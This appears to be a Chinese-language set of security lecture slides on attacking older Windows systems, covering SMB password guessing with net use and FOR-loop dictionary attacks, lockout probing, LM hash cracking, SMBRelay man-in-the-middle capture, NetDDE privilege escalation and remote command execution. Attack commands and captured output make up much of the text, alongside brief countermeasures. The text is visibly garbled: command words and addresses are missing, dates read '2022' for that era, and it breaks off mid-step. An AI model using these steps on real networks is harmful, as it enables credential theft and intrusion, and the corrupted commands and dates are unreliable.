【正文】 獲取的信息 ， 見到過在這個字段中以明文的形式寫出的密碼 。 那些不愿意記住復雜密碼的 “ 不幸的 ” 用戶經常在注釋字段中有很多提示 ， 其有助于密碼猜測 ? Administrators組或 Domain Admins組的成員 這些賬戶通常是攻擊者的目標 ， 因為它們擁有本地系統(tǒng)或域的至高無上的權限 。 同時 ， 使用 Microsoft的默認工具不能鎖定本地的Administrator賬戶 ， 這使得它成為連續(xù)密碼猜測攻擊的目標 回顧掃描結果 ? 共享的組賬戶 大多數(shù)組織都傾向于在給定環(huán)境中的大部分系統(tǒng)上重用賬戶憑據(jù) 。例如類似于 backup(備份 )或 admin(管理 )這樣的賬戶名稱 。 這些賬戶的密碼通常都比較容易猜測 ? 最近一定時期內沒有修改過密碼的賬戶 這通常表明用戶和系統(tǒng)管理員對賬戶維護工作的不重視 ， 有可能導致潛在的危險 。 這些賬戶也可能會使用在創(chuàng)建該賬戶時指定的默認密碼 ， 這是很容易猜出的 (通常會使用單位的名稱 ， 或者是Wele(歡迎 )等單詞 ） ? 最近一定時期內沒有登錄過的賬戶 同樣 ， 使用頻率很低的賬戶也是維護工作的疏忽所導致的 ， 它們的密碼通常也比較容易猜出 避免賬戶鎖定－探測鎖定 閾 值 ? Enum – p ? Guest帳戶猜測 在 Windows 2022上 ， Guest賬戶在默認情況下是被禁用的 ，但是如果你達到了鎖定閾值 ， 你仍然能夠收到提示 Guest猜測 ? C:\ use \\\ipc$ * /u:guest Type the password for \\mgmgrand\ipc$: System error 1326 has occurred. Logon failure: unknown user name or bad password. ? C:\ use \\\ipc$ * /u:guest Type the password for \\mgmgrand\ipc$: System error 1909 has occurred. The referenced account is currently locked out and may not be logged on to. Guest猜測 ? 在猜測 Guest(或其他賬戶 )的密碼時 ， 需要注意的另外一件事是如果你確實猜對了一個已經被禁用賬戶的密碼 ， 那么將會出現(xiàn)另一種不同的錯誤消息： C:\ use \\\ipc$ * /u:guest Type the password for \\mgmgrand\ipc$: System error 1331 has occurred. Logon failure: account currently disabled. ? 在 Windows 2022中 ， Guest賬戶的密碼默認為空 。 于是 ， 如果你連續(xù)地以空密碼來猜測 Guest賬戶 ， 那么永遠也不會達到鎖定閾值 (除非密碼被人為修改過 ) 開始攻擊 ?猜測 SMB密碼 手工 SMB密碼猜測 C:\ use \\\ipc$ password /u:\username System error 1326 has occurred. Logon failure: unknown user name or bad password. 可能的用戶名密碼組合 (做字典，直接使用 Xsa測試） 使用 For循環(huán)字典攻擊 ?創(chuàng)建字典 C:\echo administrator administrator password administrator administrator 使用 For循環(huán)字典攻擊 ?猜測 C:\FOR /F tokens=1,2* %i in ()^ More? do use \\\IPC$ %j /u:\%i^ More? 2nul^ More? amp。amp。 echo %time% %date% ^ More? amp。amp。 echo \\ acct: %i pass: %j 使用 For循環(huán)字典攻擊 ?查看猜測結果 C:\type 11:53: Wed 05/09/2022 \\ acct: administrator pass: 自動攻擊工具 ?NAT ?SMBGrind ?Fgrind 對策 ? 實施密碼復雜性要求 ? 賬戶鎖定 ? 啟用登錄失敗事件的審核 ? 查看事件日志 ? 鎖定真正的 Administrator賬戶并創(chuàng)建一個假目標 ? 禁用閑置賬戶 ? 仔細核查管理人員 開始攻擊 ?竊聽 SMB認證 竊聽方法 ?直接從網(wǎng)絡電纜上嗅探 SMB憑據(jù) ?使用欺騙性服務器捕獲 SMB憑據(jù) ?中間人 (Maninthemiddle， MITM)攻擊 LAN Manager的口令散列 ?微軟在 Windows NT 和 2022系統(tǒng)里缺省安裝了LAN Manager口令散列 ?由于 LAN Manager使用的加密機制比微軟現(xiàn)在的方法脆弱 ， LAN Manager的口令能在很短的時間內被破解 。 即使是強健的口令散列也能在一個月內破解掉 LAN Manager的口令散列機制 ?長的口令被截成 14個字符 ? 短的口令被填補空格變成 14個字符 ?口令中所有的字符被轉換成大寫 ?口令被分割成兩個 7個字符的片斷 LAN Manager的口令散列機制 ? LM算法是從賬戶密碼的兩個獨立的 7個字符分段創(chuàng)建用戶的散列的 ? 前 8個字節(jié)來自于用戶密碼的前 7個字符 ， 隨后的 8個字節(jié)來自于密碼的第 8~14個字符 LAN Manager的口令散列機制 ? 每塊都可以通過對所有可能的 8字節(jié)組合進行窮舉攻擊而猜出 ? 攻擊全部的 8字節(jié) “ 字符空間 ” 對于現(xiàn)代的桌面計算機處理器來說是很輕松的事情 ? 如果攻擊者能夠發(fā)現(xiàn)用戶的 LM散列 ， 那么他們最終破解得到實際的明文密碼就很可能了 LC4phtcrack L0phtcrack的局限性 ? 只能從共享介質中捕獲質詢 應答通信 ? 目前還不能從兩個 Windows 2022系統(tǒng)間的登錄交換中獲取散列 ? 通過網(wǎng)絡監(jiān)聽破解質詢 應答散列所需的時間隨著添加的密碼散列數(shù)量而線性增長 ? 在使用 SMBCapture之前 ， WinPcap 程序必須成功安裝和運行 ? 目前還不能從 NTLMv2質詢 應答通信中得到散列 欺騙－ 將 SMB登錄重定向到攻擊者 ? 假設攻擊者能夠欺騙用戶連接到他所指定的 SMB服務器上去 ， 捕獲 LM應答就變得容易多 ? L0phtcrack的早期版本中曾經建議了一種最基本的欺騙方法：向目標用戶發(fā)送一封電子郵件 ， 其中嵌入假冒的 SMB服務器的超級鏈接 。 用戶收到這封郵件 ， 單擊超級鏈接 (手動的或自動的 )， 客戶端會在不受注意的情況下將該用戶的SMB憑據(jù)通過網(wǎng)絡發(fā)送 ? 這樣的超級鏈接很容易偽裝 ， 而且通常只需要與用戶進行很少的交互 ， 因為如果沒有明確提供其他認證信息的話 ,Windows會自動嘗試以當前用戶的身份登錄 對策 ? 確保遵守網(wǎng)絡安全的最佳操作準則 。 在受到保護的網(wǎng)絡中使用 SMB服務 ， 確保全部的網(wǎng)絡基礎設施不允許SMB通信到達不受信任的結點上 ? 配置網(wǎng)絡中所有的 Windows系統(tǒng) ， 禁止 LM散列在網(wǎng)絡中的傳播 禁止發(fā)送 LM散列 使用 SMBRelay捕獲 SMB認證 ? SMBRelay實際上是一個 SMB服務器 ， 它能夠從到來的SMB通信中收集用戶名和密碼散列 ? 顧名思義 ， SMBRelay不僅能夠實現(xiàn)虛假的 SMB終端的功能 —— 在特定的情況下 ， 它還能夠進行中間人 (maninthemiddle， MITM)攻擊 建立假的 SMB服務器 C:\smbrelay /E SMBRelay ?TCP (NetBT) level SMB maninthemiddle relay attack Copyright 2022: Sir Dystic, Cult of the Dead Cow Send plaints, ideas and donations to [2] ETHERNET CSMACD ?3Com 10/100 Mini PCI Ether Adapter [1] SOFTWARE LOOPBACK ?MS TCP Loopback interface 啟動假的 SMB服務器 C:\smbrelay /IL 2 /IR 2 ；在序號為 2的網(wǎng)絡接口上建立 SMBRelay ?TCP (NetBT) level SMB maninthemiddle relay attack Copyright 2022: Sir Dystic, Cult of the Dead Cow Send plaints, ideas and donations to Using relay adapter index 2: 3Com EtherLink PCI 等待并捕獲 SMB連接 Connection from :1526 …… Request type: Session Message 137 bytes …… Username: administrator Domain: CAESARSTS OS: Windows 2022 2195 Lanman type: Windows 2022 Password hash written to disk 權限提升 ?NetDDE 權限提升 ? 權限提升通常是指提升當前用戶賬戶的能力 ， 達到具有更 高 權 限 的 賬 戶 ， 通 常 是 超 級 用 戶 ， 例如Administrator或 SYSTEM的過程 ? 從惡意黑客的角度來說 ， 獲取一個普通賬戶 ， 然后進行權限提升攻擊 ， 比遠程進行攻擊直接獲取超級用戶權限要容易得多 ? 不管在哪種情況下 ， 無論他達到了什么特權級別 ， 通過認證的攻擊者都比未通過認證時要有很多達到目的的選擇 作為 SYSTEM身份運行的 NetDDE ? 2022年 2月 ， @stake的 Dildog發(fā)現(xiàn)了 Windows 2022的網(wǎng)絡動態(tài)數(shù)據(jù)交換服務 (Network Dynamic Data Exchange Service， NetDDE)中的一個漏洞 ， 這個漏洞允許本地用戶以 SYSTEM特權運行任意的命令 ? NetDDE是使應用程序通過 “ 受信任的共享 ” 來共享數(shù)據(jù)的一種技術 。 通過受信任的共享 ， 可以發(fā)出請求執(zhí)行應用程序 ， 并運行在 SYSTEM賬戶的上下文中 獲得交互 ?命令行控制 ?GUI控制 交互方式 ? 一旦攻擊者獲取了對 Windows 2022系統(tǒng)的管理訪問 ， 幾乎沒有什么方法能夠阻止他 將帶來的損害 。 很少有攻擊者會滿足于他所獲得的 “ 管理 ” 成就并滿意地離開 。 相反 ， 他總會進一步企圖獲取交互式的控制 ? 交互控制是查看系統(tǒng)的內部工作狀態(tài)并任意執(zhí)行命令的能力 ， 就像物理上坐在系統(tǒng)前面一樣 。 在 Windows世界中 ， 這可以通過兩種方式之一來實現(xiàn)：通過命令行界面 ， 例如類似于 tel的連接 ， 或者通過圖形化的界面 ， 例如 PCAnywhere、 Microsoft終端服務器或其他類似的遠程控制產品 ? 當然 ， 攻擊者不會希望使用這種重量級的技術 ， 他們需要的是小的 、易于隱藏的控制方法 命令行控制 ? ? ?Net use (直接使用 ) ? Windows NT/2022 Resource Kit ?式 ?要使用 Windows系統(tǒng)的命令行控制 ， 你必須進行如下步驟的操作： 1. 與目標之間創(chuàng)建管理連接： C:\ use \\\ipc$ password /u:administrator 2. 將一個驅動器映射到管理共享 C$： C:\ use * \\\c$ Drive D: is now connected to \\\c$. The mand pleted successfully. 3. 將 ： C:\copy d:\winnt\system32 4. 調用 sc命令啟動計劃任務服務： C:\sc \\ start schedule 5. 確定遠程系統(tǒng)上的時間： C:\ time \\ at命令啟動